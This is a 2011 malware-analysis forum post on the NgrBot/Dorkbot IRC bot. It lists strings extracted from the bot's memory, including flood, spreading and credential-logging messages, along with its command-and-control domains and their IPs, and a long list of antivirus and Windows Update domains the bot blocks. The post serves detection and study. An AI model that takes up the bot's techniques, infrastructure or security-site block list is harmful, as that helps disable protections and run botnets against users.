NgrBot (aka Win32/Dorkbot.gen!A)

Forum for analysis and discussion about malware.

NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Tue May 31, 2011 8:43 pm

This thread is about the IRC Bot: NgrBot, a reptile mod.
He have alot of features like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc

Here is a description from one coder of the NgrBot's development team:
Image

2 Samples attached.


Microsoft MPC ~ http://www.microsoft.com/security/porta ... FDorkbot.A

VirusTotal result:
5C32CC9667CE83C42D95A28760044107.exe.ViR: http://www.virustotal.com/file-scan/rep ... 1306869496
59331fe7a82583ae9ebfbdf0f8b68f9f.exe.ViR: http://www.virustotal.com/file-scan/rep ... 1305489998

Online Sandbox results:
5C32CC9667CE83C42D95A28760044107.exe.ViR: (Sample from today, 31 May 2k11)
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 5A286E68F2
http://camas.comodo.com/cgi-bin/submit? ... 26f384dbfd
http://www.threatexpert.com/report.aspx ... 8760044107

59331fe7a82583ae9ebfbdf0f8b68f9f.exe.ViR: (Sample from 29 April 2k11, yeah i got it since a long time)
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... 935B7BCA51
http://camas.comodo.com/cgi-bin/submit? ... a3d1d3eef7
http://www.threatexpert.com/report.aspx ... F0F8B68F9F

Example with 5C32CC9667CE83C42D95A28760044107.exe.ViR:

some memory strings:
Code: Select all
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

Ruskill feature ~ hXXp://www.freewebtown.com/usermx/av.txt
contains:
Code: Select all
1norton.com
dnl-cd14.kaspersky-labs.com
dnl-kr14.kaspersky-labs.com
download657.avast.com
dl3.antivir-pe.com
sophos3.ucd.ie
updates1.kaspersky-labs.com
diamondcs.fileburst.com
bitdefender.fr
sophos4.ucd.ie
updates2.kaspersky-labs.com
dispatch.mcafee.com
bkav.com.vn
sophos5.ucd.ie
updates3.kaspersky-labs.com
blackice.iss.net
sophos6.ucd.ie
updates4.kaspersky-labs.com
dl1.antivir.de
ca.com
download.microsoft.com
go.microsoft.com
msdn.microsoft.com
office.microsoft.com
windowsupdate.microsoft.com
avp.ru
kaspersky.ru
kaspersky.com
kaspersky-labs.com
downloads1.kaspersky-labs.com
downloads2.kaspersky-labs.com
downloads3.kaspersky-labs.com
downloads4.kaspersky-labs.com
downloads5.kaspersky-labs.com
viruslist.com
viruslist.ru
symantec.com
customer.symantec.com
liveupdate.symantec.com
liveupdate.symantecliveupdate.com
securityresponse.symantec.com
service1.symantec.com
updates.symantec.com
ad.doubleclick.net
ad.fastclick.net
ads.fastclick.net
ar.atwola.com
atdmt.com
avp.ch
avp.com
awaps.net
banner.fastclick.net
banners.fastclick.net
click.atdmt.com
clicks.atdmt.com
download.mcafee.com
downloads.microsoft.com
engine.awaps.net
fastclick.net
f-secure.com
ftp.f-secure.com
ftp.sophos.com
mast.mcafee.com
mcafee.com
media.fastclick.net
my-etrust.com
nai.com
networkassociates.com
phx.corporate-ir.net
secure.nai.com
sophos.com
spd.atdmt.com
support.microsoft.com
update.symantec.com
us.mcafee.com
vil.nai.com
trendmicro.com
www3.ca.com
ids.kaspersky-labs.com
rads.mcafee.com
grisoft.com
avira.com
bitdefender.com
dl2.antivir.de
dl3.antivir.de
dl4.antivir.de
downloads-us1.kaspersky-labs.com
downloads-us2.kaspersky-labs.com
downloads-us3.kaspersky-labs.com
drweb.com
eset.com
free-av.com
ftp.downloads2.kaspersky-labs.com
ftp.kasperskylab.ru
microsoft.com
updates5.kaspersky-labs.com
virusscan.jotti.org
virustotal.com
update.ikaka.com
msnfix.changelog.fr
incodesolutions.com
virusinfo.prevx.com
download.bleepingcomputer.com
dazhizhu.cn
foro.noticias3d.com
nabble.com
lurker.clamav.net
lexikon.ikarus.at
research.sunbelt-software.com
virusdoctor.jp
elitepvpers.de
guru.avg.com
superuser.co.kr
ntfaq.co.kr
v.dreamwiz.com
cit.kookmin.ac.kr
forums.whatthetech.com
forum.hijackthis.de
avg.vo.llnwd.net
huaifai.go.th
mostz.com
krupunmai.com
cddchiangmai.net
forum.malekal.com
tech.pantip.com
sapcupgrades.com
247fixes.com
forum.sysinternals.com
forum.telecharger.01net.com
foros.softonic.com
avast-home.uptodown.com
dr-web-cureit.softonic.com
chkrootkit.org
diamondcs.com.au
rootkit.nl
sysinternals.com
z-oleg.com
espanol.dir.groups.yahoo.com
castlecrops.com
misec.net
safecomputing.umn.edu
antirootkit.com
greatis.com
ar.answers.yahoo.com
elhacker.org
rootkit.com
pctools.com
pcsupportadvisor.com
resplendence.com
personal.psu.edu
foro.ethek.com
foro.elhacker.net
vil.nail.com
search.mcafee.com
wmcafee.com
download.nai.com
wexperts-exchange.com
bakunos.com
darkclockers.com
Merijn.org
spywareinfo.com
spybot.info
hijackthis.de
forum.kaspersky.com
majorgeeks.com
linhadefensiva.uol.com.br
cmmings.cn
sergiwa.com
el-hacker.com
avg-antivirus.net
bleepingcomputer.com
free.grisoft.com
alerta-antivirus.inteco.es
analysis.seclab.tuwien.ac.at
kztechs.com
ad-aware-se.uptodown.com
stdio-labs.blogspot.com
box.net
foro.el-hacker.com
free.avg.com
tecno-soft.com
ladooscuro.es
ftp.drweb.com
download.microsoft.comguru0.grisoft.cz
guru1.grisoft.cz
guru2.grisoft.cz
guru3.grisoft.cz
it.answers.yahoo.com
softonic.com
guru4.grisoft.cz
guru5.grisoft.cz
virusspy.com
download.f-secure.com
malwareremoval.com
forums.cnet.com
hjt-data.trend-braintree.com
pantip.com
secubox.aldria.com
forospyware.com
manuelruvalcaba.com
zonavirus.com
leforo.com
siteadvisor.com
blog.threatfire.com
threatexpert.com
blog.hispasec.com
configurarequipos.com
sosvirus.changelog.fr
psicofxp.com
mailcenter.rising.com.cn
mailcenter.rising.com
rising.com.cn
rising.com
babooforum.com.br
runscanner.net
blogschapines.com
upload.changelog.fr
raymond.cc
changelog.fr
pcentraide.com
atazita.blogspot.com
thinkpad.cn
final4ever.com
files.filefont.com
infos-du-net.com
trendsecure.com
forum.hardware.fr
utilidades-utiles.com
blogs.icerocket.com
spychecker.com
geekstogo.com
forums.maddoktor2.com
smokey-services.eu
clubic.com
linhadefensiva.org
rolandovera.com
download.sysinternals.com
pcguide.com
thetechguide.com
ozzu.com
changedetection.com
espanol.groups.yahoo.com
sunbeltsecurity.com
community.thaiware.com
avpclub.ddns.info
offensivecomputing.net
boardreader.com
guiadohardware.net
msnvirusremoval.com
cisrt.org
fixmyim.com
samroeng.hi5.com
daboweb.com
forums.techguy.org
hijackthis.download3000.com
cybertechhelp.com
superdicas.com.br
51nb.com
downloads.andymanchesta.com
andymanchesta.com
info.prevx.com
aknow.prevx.com
securitywonks.net
yoreparo.com
lavasoft.com
virscan.org
eeload.com
file.net
onecare.live.com
mvps.org
laneros.com
housecall.trendmicro.com
avast.com
onlinescan.avast.com
ewido.net
trucoswindows.net
mozilla-hispano.org
futurenow.bitdefender.com
f-prot.com
security.symantec.com
oldtimer.geekstogo.com
kr.ahnlab.com
thejokerx.blogspot.com
2-spyware.com
antivir.es
prevx.com
ikarus.net
bbs.s-sos.net
forums.majorgeeks.com
castlecops.com
kaspersky.es
subs.geekstogo.com
forospanish.com
fortinet.com
safer-networking.org
fortiguardcenter.com
dougknox.com
vsantivirus.com
firewallguide.com
auditmypc.com
spywaredb.com
mxttchina.com
ziggamza.net
forospyware.es
pogonyuto.forospanish.com
antivirus.comodo.com
spywareterminator.com
eradicatespyware.net
freespywareremoval.info
personalfirewall.comodo.com
clamav.net
antivirus.about.com
pandasecurity.com
webphand.com
mx.answers.yahoo.com
sandboxie.com
clamwin.com
cwsandbox.org
arswp.com
es.answers.yahoo.com
trucoswindows.es
networkworld.com
norman.com
espanol.answers.yahoo.com
tallemu.com
viruschief.com
scanner.virus.org
housecall65.trendmicro.com
hjt.networktechs.com
techsupportforum.com
whatthetech.com
soccersuck.com
comunidad.wilkinsonpc.com.co
forum.piriform.com
tweaksforgeeks.com
daniweb.com
pchell.com
spyany.com
experts-exchange.com
wikio.es
forums.devshed.com
forum.tweaks.com
wilderssecurity.com
techspot.com
thecomputerpitstop.com
es.wasalive.com
secunia.com
es.kioskea.net
taringa.net
cyberdefender.com
feedage.com
new.taringa.net
forum.zazana.com
forum.clubedohardware.com.br
computing.net
discussions.virtualdr.com
forum.securitycadets.com
techimo.com
13iii.com
dicasweb.com.br
infosecpodcast.com
usbcleaner.cn
net-security.org
bleedingthreats.net
acs.pandasoftware.com
funkytoad.com
360safe.cn
360safe.com
bbs.360safe.cn
bbs.360safe.com
codehard.wordpress.com
360.cn
360.com
p3dev.taringa.net
precisesecurity.com
baike.360.cn
baike.360.com
kaba.360.cn
kaba.360.com
deckard.geekstogo.com
forums.comodo.com
down.360safe.cn
down.360safe.com
x.360safe.com
dl.360safe.com
hotshare.net
free.antivirus.com
updatem.360safe.com
updatem.360safe.cn
update.360safe.cn
update.360safe.com
bbs.duba.net
duba.net
zhidao.baidu.com
hi.baidu.com
drweb.com.es
msncleaner.softonic.com
javacoolsoftware.com
file.ikaka.com
file.ikaka.cn
bbs.ikaka.com
zhidao.ikaka.com
eset-la.com
software-files.download.com
ikaka.com
ikaka.cn
bbs.cfan.com.cn
cfan.com.cn
es.mcafee.com
downloads.malwarebytes.org
bbs.kafan.cn
bbs.kafan.com
bbs.kpfans.com
bbs.taisha.org
support.f-secure.com
bbs.winzheng.com
foros.zonavirus.com
alerta-antivirus.red.es
malwarebytes.org
commentcamarche.net
infospyware.com
bitdefender.es
foros.toxico-pc.com
emsisoft.de
securitynewsportal.com
secuser.com
a188.x.akamai.net
liveupdate.symantec.d4p.net
ftp.nai.com
grisoft.cz
free.grisoft.cz
tds.diamondcs.com.au
ieupdate.gdata.de
ieupdate6.gdata.de
ieupdate5.gdata.de
ieupdate4.gdata.de
ieupdate3.gdata.de
ieupdate2.gdata.de
ieupdate1.gdata.de
iavs.cz
download7.avast.com
download6.avast.com
download5.avast.com
download4.avast.com
download3.avast.com
download2.avast.com
download1.avast.com
upgrade.bitdefender.com
lavasoftusa.com
a-2.org
updates.a-2.org
niuone.norman.no
attechnical.com
zeylstra.nl
fractus.mat.uson.mx
toonbox.de
radius.turvamies.com
downloads.My-eTrust.com
v4.windowsupdate.microsoft.com
v5.windowsupdate.microsoft.com
NoAdware.net
nod32.com
eset.sk
avu.zonelabs.com
retail.sp.f-secure.com
retail01.sp.f-secure.com
retail02.sp.f-secure.com
moosoft.com
secuser.model-fx.com
downloads-eu1.kaspersky-labs.com
pccreg.antivirus.com
updates.sald.com
k-otik.com
megasecurity.org
fr.mcafee.com
antivirus.cai.com
pandasoftware.com
securitoo.com
Kaspersky-FR.com
avgfrance.com
antivirus-online.de
ftp.esafe.com
ftp.microworldsystems.com
ftp.europe.f-secure.com
ftp.ca.co
ftp.symantec.com
files.trendmicro-europe.com
akamai.net
inline-software.de
ravantivirus.com
drsolomon.com
openantivirus.org
pandasoftware.es
dialognauka.ru
viguard.com
nod32.lu
zonelabs.fr
anti-virus-software-review.com
vet.com.au
eicar.org
anti-virus.com
microsoft.fr
trendmicro.fr
fr.bitdefender.com
sophos.fr
nsclean.com
antiviraldp.com
pestpatrol.com
agnitum.com
simplysup.com
centralcommand.com
www1.my-etrust.com
authentium.com
finjan.com
psnw.com
gwava.nl
gecadsoftware.com
pspl.com
safetynet.com
stiller.com
sybari.com
wildlist.com
mcaffee.com
deerfield.com
kerio.com
looknstop.com
mcafee-at-home.com
sygate.com
tinysoftware.com
visualizesoftware.com
zonelabs.com
zonelog.co.uk
webroot.com
lavasoft.nu
spywareguide.com
aluriasoftware.com
spyblocker-software.com
spycop.com
wilderssecurity.net
trapware.com
winpatrol.com
liutilities.com
x-cleaner.com
shop.symantec.com
kaspersky.co.uk
housecall.com
sophos7.ucd.ie
dl1.antivir-pe.com
sophos8.ucd.ie
dl1.antivir-pe.de
sophos9.ucd.ie
dl1.avgate.net
sos.rising.com.cn
dl10.freeav.net
spftrl.digitalriver.com
stats.norton.com
dl2.antivir-pe.com
sucop.com
dl2.antivir-pe.de
sunbeltsoftware.com
dl2.avgate.net
download.com
sunbelt-software.com
vrv.com.cn
download.com.vn
dl3.antivir-pe.de
symantec-ese.baynote.net
dl3.avgate.net
u19.eset.com
u38.eset.com
mmsk.cn
u91.eset.com
download516.avast.com
9down.com
dl7.avgate.net
u63.eset.com
dnl-ru1.kaspersky-labs.com
tool.ikaka.com
moneybookers.com
u25.eset.com
u98.eset.com
download925.avast.com
download94.avast.com
bbs.kaspersky.com.cn
download926.avast.com
download940.avast.com
bbs.mcafeefans.com
download927.avast.com
download941.avast.com
bbs.sucop.com
download928.avast.com
download942.avast.com
bbs.trendmicro.com.cn
download929.avast.com
download943.avast.com
download93.avast.com
download944.avast.com
bitdefender.com.ua
download930.avast.com
download945.avast.com
download931.avast.com
download946.avast.com
buddy.bitdefender.com
download932.avast.com
download947.avast.com
buy.rising.com.cn
download933.avast.com
download948.avast.com
download934.avast.com
download949.avast.com
cdn.atwola.com
download935.avast.com
download95.avast.com
center.rising.com.cn
download936.avast.com
download950.avast.com
cert.org
download937.avast.com
download951.avast.com
download938.avast.com
download952.avast.com
download939.avast.com
download953.avast.com
download954.avast.com
download955.avast.com
cn.mcafee.com
download956.avast.com
download957.avast.com
cn.trendmicro.com
download958.avast.com
download959.avast.com
comodo.com
download96.avast.com
download960.avast.com
coresecurity.com
download961.avast.com
download962.avast.com
cpsecure.com
download963.avast.com
download964.avast.com
csc.rising.com.cn
download965.avast.com
download966.avast.com
download967.avast.com
download968.avast.com
download969.avast.com
download97.avast.com
download970.avast.com
download971.avast.com
dl4.antivir-pe.com
download972.avast.com
download973.avast.com
dl4.antivir-pe.de
download974.avast.com
download975.avast.com
dl4.avgate.net
download976.avast.com
download977.avast.com
dl5.avgate.net
download978.avast.com
download979.avast.com
dl6.avgate.net
download98.avast.com
download980.avast.com
dl8.avgate.net
download99.avast.com
dl8.freeav.net
dl9.avgate.net
dl9.freeav.net
dnl-cd1.kaspersky-labs.com
dnl-cd10.kaspersky-labs.com
dswlab.com
eeye.com
dnl-cd11.kaspersky-labs.com
emsisoft.com
dnl-cd12.kaspersky-labs.com
esafe.com
download684.avast.com
dnl-cd4.kaspersky-labs.com
downloads-eu2.kaspersky-labs.com
dnl-us9.kaspersky-labs.com
download649.avast.com
dnl-cn15.kaspersky-labs.com
download618.avast.com
download695.avast.com
download603.avast.com
download685.avast.com
dnl-cd5.kaspersky-labs.com
downloads-eu3.kaspersky-labs.com
download.avg.com
download650.avast.com
download619.avast.com
fw.rising.com.cn
shudoo.com
download696.avast.com
download604.avast.com
download686.avast.com
dnl-cd6.kaspersky-labs.com
downloads-eu4.kaspersky-labs.com
download651.avast.com
download620.avast.com
fx.dk
download697.avast.com
bbs.janmeng.com
download605.avast.com
download687.avast.com
dnl-cd7.kaspersky-labs.com
download.eset.com
download652.avast.com
download621.avast.com
gdata.de
download698.avast.com
dnl-cd13.kaspersky-labs.com
download606.avast.com
download688.avast.com
filseclab.com
dnl-cd8.kaspersky-labs.com
download653.avast.com
download622.avast.com
download699.avast.com
dnl-cd2.kaspersky-labs.com
download607.avast.com
download689.avast.com
dnl-cd9.kaspersky-labs.com
download654.avast.com
download623.avast.com
go.rising.com.cn
dnl-cd3.kaspersky-labs.com
download608.avast.com
download690.avast.com
forum.ikaka.com
dnl-cn1.kaspersky-labs.com
downloads-us4.kaspersky-labs.com
download.norman.no
download655.avast.com
download624.avast.com
download7.quickheal.com
dnl-cn10.kaspersky-labs.com
download609.avast.com
download691.avast.com
forum.jiangmin.com
dnl-cn11.kaspersky-labs.com
sandbox.norman.com
download.rising.com.cn
download656.avast.com
download625.avast.com
download700.avast.com
dnl-cn12.kaspersky-labs.com
download617.avast.com
download692.avast.com
dnl-cn13.kaspersky-labs.com
scanner.novirusthanks.org
ftp.updates1.kaspersky-labs.com
fr.drweb.com
download.softpedia.com
u2.eset.com
u56.eset.com
ftp.updates2.kaspersky-labs.com
download0.avast.com
u20.eset.com
u57.eset.com
ftp.updates3.kaspersky-labs.com
fr1.drweb.com
u21.eset.com
u58.eset.com
ftp.updates4.kaspersky-labs.com
fr2.drweb.com
download1.quickheal.com
u22.eset.com
u59.eset.com
ftp.us.mcafee.com
fr3.drweb.com
download10.quickheal.com
u23.eset.com
u6.eset.com
ftp.viruslist.com
fr4.drweb.com
download100.avast.com
bitdefender.secyber.net
u24.eset.com
u60.eset.com
fr5.drweb.com
download1us.softpedia.com
u26.eset.com
u61.eset.com
fr6.drweb.com
u27.eset.com
u62.eset.com
symantecliveupdate.com
fr7.drweb.com
download2.quickheal.com
u28.eset.com
u64.eset.com
symatec.com
download200.avast.com
u29.eset.com
u65.eset.com
hacksoft.com.pe
download201.avast.com
u3.eset.com
u66.eset.com
hauri.net
download202.avast.com
u30.eset.com
u67.eset.com
help.rising.com.cn
download203.avast.com
u31.eset.com
u68.eset.com
freeav.com
download204.avast.com
u32.eset.com
u69.eset.com
trendmicro.com.cn
download205.avast.com
u33.eset.com
u7.eset.com
ikarus.at
freeav.net
download206.avast.com
iss.net
u34.eset.com
u70.eset.com
uk.trendmicro-europe.com
jetico.com
free-av.net
download207.avast.com
k7computing.com
u35.eset.com
u71.eset.com
ftp.avp.com
download641.avast.com
download920.avast.com
dnl-kr7.kaspersky-labs.com
kaspersky.gr
anti-virus.by
ftp.bitdefender.com
update.sophos.com
dnl-us5.kaspersky-labs.com
JUSTFACEBOOK.NET
download214.avast.com
download81.avast.com
mcafeefans.com
mirror02.gdata.de
msk.drweb.com
msk1.drweb.com
msk2.drweb.com
msk3.drweb.com
msk4.drweb.com
msk5.drweb.com
msk6.drweb.com
msk7.drweb.com
niueight.norman.no
niufive.norman.no
niufour.norman.no
niunine.norman.no
niuseven.norman.no
niusix.norman.no
niuthree.norman.no
niutwo.norman.no
nod32.co.uk
nod32.datsec.de
nod32.ru
norton.com
notifier.antivir-pe.de
online.jiangmin.com
online.rising.com.cn
outpost.pl
pccreg.trendmicro.com
pcinternetpatrol.com
quickheal.co.in
reg.rising.com.cn
renewalcenter.symantec.com
safe.qq.com
scan.kingsoft.com
secdreg.org
securecomputing.com
shadow.grisoft.cz
shadu.baidu.com
shadu.duba.net
sophos1.ucd.ie
sophos10.ucd.ie
sophos2.ucd.ie
u0.eset.com
u1.eset.com
u10.eset.com
u100.eset.com
u11.eset.com
u12.eset.com
u13.eset.com
u36.eset.com
u78.eset.com
kaspersky.co.jp
download211.avast.com
kpfans.com
download208.avast.com
dnl-cn14.kaspersky-labs.com
download659.avast.com
ftp.ca.com
download693.avast.com
dnl-us2.kaspersky-labs.com
u36eset.com
u79.eset.com
download212.avast.com
kvup.jiangmin.com
download209.avast.com
download660.avast.com
ftp.customer.symantec.com
download694.avast.com
dnl-us3.kaspersky-labs.com
kaspersky.com.cn
u37.eset.com
u8.eset.com
kaspersky.dk
download213.avast.com
download210.avast.com
download661.avast.com
ftp.dispatch.mcafee.com
download701.avast.com
dnl-us4.kaspersky-labs.com
kaspersky.pl
u37eset.com
u80.eset.com
download3.quickheal.com
download662.avast.com
ftp.download.mcafee.com
download702.avast.com
dnl-us6.kaspersky-labs.com
kaspersky.se
u39.eset.com
u81.eset.com
kasperskylab.co.kr
download4.quickheal.com
download663.avast.com
ftp.downloads1.kaspersky-labs.com
download703.avast.com
dnl-us7.kaspersky-labs.com
kasperskylab.nl
u4.eset.com
u82.eset.com
download5.quickheal.com
download664.avast.com
download704.avast.com
dnl-us8.kaspersky-labs.com
kav.ru
u40.eset.com
u83.eset.com
kav.zonelabs.com
download501.avast.com
malwaredomainlist.com
download502.avast.com
download665.avast.com
ftp.downloads3.kaspersky-labs.com
download705.avast.com
download503.avast.com
kb.bitdefender.com
u41.eset.com
u84.eset.com
download504.avast.com
download505.avast.com
download666.avast.com
ftp.downloads4.kaspersky-labs.com
download706.avast.com
download511.avast.com
u42.eset.com
u85.eset.com
u14.eset.com
download512.avast.com
u15.eset.com
ftp.downloads-eu1.kaspersky-labs.com
download82.avast.com
ftp.downloads-eu2.kaspersky-labs.com
download658.avast.com
download513.avast.com
zeustracker.abuse.ch
dnl-us11.kaspersky-labs.com
ftp.downloads-eu3.kaspersky-labs.com
download75.avast.com
u43.eset.com
download626.avast.com
download514.avast.com
ftp.downloads-eu4.kaspersky-labs.com
download667.avast.com
download515.avast.com
zonealarm.com
dnl-us12.kaspersky-labs.com
ftp.downloads-us1.kaspersky-labs.com
download76.avast.com
zs.kingsoft.com
u44.eset.com
download627.avast.com
ftp.downloads-us2.kaspersky-labs.com
download668.avast.com
download6.quickheal.com
bitcity.info
dnl-us13.kaspersky-labs.com
ftp.downloads-us3.kaspersky-labs.com
download77.avast.com
bitcity.org
u45.eset.com
download628.avast.com
download600.avast.com
ftp.downloads-us4.kaspersky-labs.com
download669.avast.com
download601.avast.com
ilove.tigolbittys.info
dnl-us14.kaspersky-labs.com
download78.avast.com
ulove.tigolbittys.info
u46.eset.com
download629.avast.com
download602.avast.com
download670.avast.com
download630.avast.com
free.tinypicbox.com
dnl-us15.kaspersky-labs.com
ftp.f-prot.com
download79.avast.com
one.tinypicbox.com
u47.eset.com
download631.avast.com
download632.avast.com
download671.avast.com
download633.avast.com
gangbang.mytijn.org
download634.avast.com
ftp.grisoft.com
download8.quickheal.com
irc.bigshitsandwich.org
u48.eset.com
download635.avast.com
download636.avast.com
ftp.kaspersky.com
download672.avast.com
download637.avast.com
l33t.shadow-mods.net
download638.avast.com
ftp.kaspersky-labs.com
download80.avast.com
irc.metraiciono.com
u49.eset.com
download639.avast.com
download640.avast.com
ftp.liveupdate.symantec.com
download673.avast.com
download642.avast.com
download643.avast.com
ftp.liveupdate.symantecliveupdate.com
download83.avast.com
lovings.technigoyous.net
u5.eset.com
download644.avast.com
download645.avast.com
ftp.mast.mcafee.com
download674.avast.com
download646.avast.com
download647.avast.com
ftp.mcafee.com
download84.avast.com
u50.eset.com
download648.avast.com
download675.avast.com
download676.avast.com
download677.avast.com
download678.avast.com
ftp.my-etrust.com
download85.avast.com
u51.eset.com
download679.avast.com
download680.avast.com
download681.avast.com
download682.avast.com
download683.avast.com
ftp.networkassociates.com
download9.quickheal.com
u52.eset.com
download707.avast.com
u53.eset.com
download922.avast.com
ftp.norton.com
ftp.rads.mcafee.com
ftp.sandbox.norman.com
dnl-ru13.kaspersky-labs.com
u54.eset.com
download923.avast.com
ftp.secure.nai.com
ftp.securityresponse.symantec.com
dnl-ru14.kaspersky-labs.com
u55.eset.com
download924.avast.com
ftp.symantecliveupdate.com
ftp.symatec.com
ftp.trendmicro.com
dnl-ru15.kaspersky-labs.com
u72.eset.com
ftp.uk.trendmicro-europe.com
ftp.update.symantec.com
ftp.updates.symantec.com
u16.eset.com
dnl-ru2.kaspersky-labs.com
u73.eset.com
u17.eset.com
u18.eset.com
u74.eset.com
u75.eset.com
dnl-ru3.kaspersky-labs.com
u76.eset.com
u77.eset.com
u86.eset.com
u87.eset.com
u88.eset.com
dnl-ru4.kaspersky-labs.com
u89.eset.com
u9.eset.com
u90.eset.com
pcav.cn
u92.eset.com
u93.eset.com
dnl-ru5.kaspersky-labs.com
u94.eset.com
u95.eset.com
u96.eset.com
u97.eset.com
u99.eset.com
dnl-ru6.kaspersky-labs.com
up.duba.net
up.rising.com.cn
abuse.ch
up1.nod123.cn
upd.zonelabs.com
dnl-ru7.kaspersky-labs.com
update.aladdin.com
update.authentium.com
update.avg.com
update.avgfrance.com
dnl-ru8.kaspersky-labs.com
update.bitdefender.com
update.drweb.com
update.ewido.com
agfirewall.ru
update.grisoft.com
update.grisoft.cz
dnl-ru9.kaspersky-labs.com
update.hispasec.com
update.ikarus-software.at
update.quickheal.com
update.rising.com.cn
dnl-us1.kaspersky-labs.com
update.trendmicro.com
update7.jiangmin.com
agnitum.de
updates.drweb.com
dnl-us10.kaspersky-labs.com
updates.f-prot.com
agnitum.fr
download708.avast.com
upgrade1.bitdefender.com
upgrade2.bitdefender.com
agnitum.ru
download709.avast.com
upgrade3.bitdefender.com
upgrade4.bitdefender.com
ahnlab.com
download72.avast.com
download73.avast.com
download74.avast.com
download900.avast.com
download901.avast.com
download902.avast.com
download903.avast.com
ahn.com.cn
download904.avast.com
vncsvr.com
download905.avast.com
download906.avast.com
download907.avast.com
download908.avast.com
download909.avast.com
virusbuster.hu
download91.avast.com
download910.avast.com
download911.avast.com
download912.avast.com
download913.avast.com
download914.avast.com
atwola.com
download915.avast.com
download916.avast.com
download917.avast.com
download918.avast.com
download919.avast.com
download92.avast.com
bitdefender.co.uk
download921.avast.com
jotti.org
alert.rising.com.cn
antispy.ru
arcabit.com
arcabit.pl
ashampoo.com
avast.ru
avg.com
avgate.net
dnl-eu10.kaspersky-labs.com
bbs.360.cn
dnl-jp14.kaspersky-labs.com
bbs.cpcw.com
bbs.dswlab.com
dnl-jp15.kaspersky-labs.com
dnl-cn2.kaspersky-labs.com
dnl-jp2.kaspersky-labs.com
dnl-cn3.kaspersky-labs.com
dnl-jp3.kaspersky-labs.com
dnl-cn4.kaspersky-labs.com
dnl-jp4.kaspersky-labs.com
dnl-cn5.kaspersky-labs.com
dnl-cn6.kaspersky-labs.com
dnl-jp5.kaspersky-labs.com
dnl-cn7.kaspersky-labs.com
dnl-cn8.kaspersky-labs.com
dnl-cn9.kaspersky-labs.com
dnl-jp6.kaspersky-labs.com
dnl-eu1.kaspersky-labs.com
dnl-eu11.kaspersky-labs.com
dnl-eu12.kaspersky-labs.com
dnl-jp7.kaspersky-labs.com
dnl-eu13.kaspersky-labs.com
dnl-eu14.kaspersky-labs.com
dnl-eu15.kaspersky-labs.com
dnl-jp8.kaspersky-labs.com
dnl-eu2.kaspersky-labs.com
dnl-eu3.kaspersky-labs.com
dnl-eu4.kaspersky-labs.com
dnl-jp9.kaspersky-labs.com
dnl-eu5.kaspersky-labs.com
dnl-eu6.kaspersky-labs.com
dnl-eu7.kaspersky-labs.com
dnl-kr1.kaspersky-labs.com
dnl-eu8.kaspersky-labs.com
dnl-eu9.kaspersky-labs.com
dnl-jp1.kaspersky-labs.com
dnl-kr10.kaspersky-labs.com
dnl-jp10.kaspersky-labs.com
dnl-jp11.kaspersky-labs.com
dnl-jp12.kaspersky-labs.com
dnl-kr11.kaspersky-labs.com
dnl-jp13.kaspersky-labs.com
dnl-kr12.kaspersky-labs.com
dnl-kr13.kaspersky-labs.com
dnl-kr15.kaspersky-labs.com
dnl-kr2.kaspersky-labs.com
dnl-kr3.kaspersky-labs.com
dnl-kr4.kaspersky-labs.com
dnl-kr5.kaspersky-labs.com
dnl-kr6.kaspersky-labs.com
dnl-kr8.kaspersky-labs.com
dnl-kr9.kaspersky-labs.com
dnl-ru10.kaspersky-labs.com
dnl-ru11.kaspersky-labs.com
dnl-ru12.kaspersky-labs.com

Dns used for the botnet:
Code: Select all
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]

